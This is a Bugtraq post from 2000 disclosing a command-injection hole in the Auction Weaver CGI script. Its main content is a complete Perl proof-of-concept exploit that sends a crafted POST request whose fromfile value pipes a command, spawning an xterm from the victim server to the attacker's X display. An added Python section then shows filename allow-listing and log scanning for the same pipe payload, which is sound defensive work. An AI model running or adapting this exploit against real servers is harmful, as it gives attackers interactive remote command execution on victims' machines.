Bugtraq mailing list archives
More problems with Auction Weaver & CGI Script Center.
From: teleh0r - <teleh0r () DOGLOVER COM>
Date: Wed, 30 Aug 2000 13:20:33 -0400
CGI Script Center recently upgraded Auction Weaver 1.0 to 1.2 due to a security issue found and reported by Meliksah Ozoral. Today, I decided to take a look at Auction Weaver just to check if the issue and possible other security problems were now fixed. I guessed they had taken a *close* look at their scripts, considering the problems reported lately - but I guessed wrong... I have only been able to check the below exploit on the shareware version, but I strongly believe that the PRO version is exploitable as well. Or perhaps only those who pay get secure scripts? Maybe that would be a successful business policy? ;)

CGI Script Center, _please_ contact me if you want help securing your scripts.

Sincerely yours,
teleh0r

8<---auctionweaver-exploit.pl------------------------------------
#!/usr/bin/perl -w
## Auction Weaver 1.02 / Only confirmed with LITE
## - Proof of Concept exploit -
##
## CGI Script Center have just released an update
## of Auction Weaver due to security reasons - I
## suggest that you spend some more time securing
## it, and the other scripts - It is really needed.
##
## This exploit will spawn an xterm from $target
## to $attacker.
##
## This exploit will not work on hosts running
## Auction Weaver on NT, due to the xterm call.
##
## CGI Script Center, please contact me if you need
## help with securing your scripts...
##
## teleh0r () doglover com / anno 2000
## http://teleh0r.cjb.net

use strict;
use Socket;

if (@ARGV < 3) {
    print("Usage: $0 <target> <attacker> <dpy>\n");
    exit(1);
}

my($target,$attacker,$dpy,$length,$cgicode,
   $agent,$sploit,$iaddr,$paddr,$proto);

($target,$attacker,$dpy) = @ARGV;

if ($dpy !~ /\d/) {
    print("dpy must be a number, probably 0\n");
    exit(1);
}

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

system("xhost + $target");

$length = 138 + length($attacker.$dpy);
$cgicode = "flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1&catdir".
           "=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem=1&sbut".
           "ton=BID";
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# The path to auctionweaver.pl may of course need to be changed.
$sploit = "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$cgicode";

$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);

sleep(3);
system("xhost - $target");
print("\nAll done - hopefully you got the flying xterm!\n");
exit(0);
-----------------------------------------------------------------
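The payload in the post puts a value of the form |command| into the fromfile field, which is the shape Perl's two-argument open() treats as a pipe to a command rather than a file name. The following is an added example (not part of the original post and not Auction Weaver's own code) of what a defender would do with that: a strict allow-list check for a file-name parameter, a decoder that flags form fields carrying shell metacharacters, and a scan over request-body log lines. The field names come from the posted request; the log format, the IP addresses and the allow-list rule are constructed assumptions.

```python
"""Validation and detection for pipe-style injection in CGI form bodies.

Added example; the parameter names (fromfile, placebid, ...) are taken from
the request in teleh0r's post, everything else is a constructed assumption.
"""
import re
from urllib.parse import parse_qs

# Allow-list for a file-name parameter: no path separators, no leading dot,
# no shell metacharacters, bounded length. Deny-lists miss encodings; an
# allow-list does not.
SAFE_FILENAME = re.compile(r'^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$')

# Characters that turn a "file name" into a command in Perl's two-argument
# open() (a leading or trailing '|') or in a shell.
SHELL_META = set('|;&$`<>(){}\n\r')

# Assumed log format of a reverse proxy that records the POST body
# (constructed; real proxies need explicit configuration to log bodies).
LOG_RE = re.compile(
    r'^(?P<src>\S+) - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) body="(?P<body>[^"]*)"$')

# Constructed sample lines: one carrying the pipe payload from the post
# (with a private-range address in place of the attacker host), one benign.
LOG_LINES = [
    '10.0.0.5 - [30/Aug/2000:13:20:33] "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0" '
    '200 body="flag1=1&fromfile=%7Cxterm+-display+10.0.0.5%3A0%7C&placebid=1"',
    '10.0.0.7 - [30/Aug/2000:13:21:10] "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0" '
    '200 body="flag1=1&fromfile=item42.txt&placebid=1"',
]


def is_safe_filename(value):
    """True only if the value is a plain file name under the allow-list."""
    return bool(SAFE_FILENAME.match(value)) and '..' not in value


def check_form_body(body):
    """Decode a form-urlencoded body and return {field: decoded value} for
    every field whose decoded value contains a shell metacharacter.
    parse_qs undoes %7C -> '|' and '+' -> ' ', so encoded payloads are seen
    the way the CGI script would see them."""
    fields = parse_qs(body, keep_blank_values=True)
    flagged = {}
    for name, values in fields.items():
        for v in values:
            if SHELL_META & set(v):
                flagged[name] = v
    return flagged


def scan_log(lines):
    """Return (source, path, flagged_fields) for each logged request whose
    body carries shell metacharacters in any field."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        flagged = check_form_body(m.group('body'))
        if flagged:
            hits.append((m.group('src'), m.group('path'), flagged))
    return hits


if __name__ == '__main__':
    for src, path, fields in scan_log(LOG_LINES):
        print(f"{src} -> {path}: suspicious fields {fields}")
```

The fix on the application side is the allow-list in is_safe_filename applied before the parameter reaches any file or command API (and, in Perl, the three-argument form of open() so that the mode can never come from user input); the log scan is the compensating detection while that fix is pending.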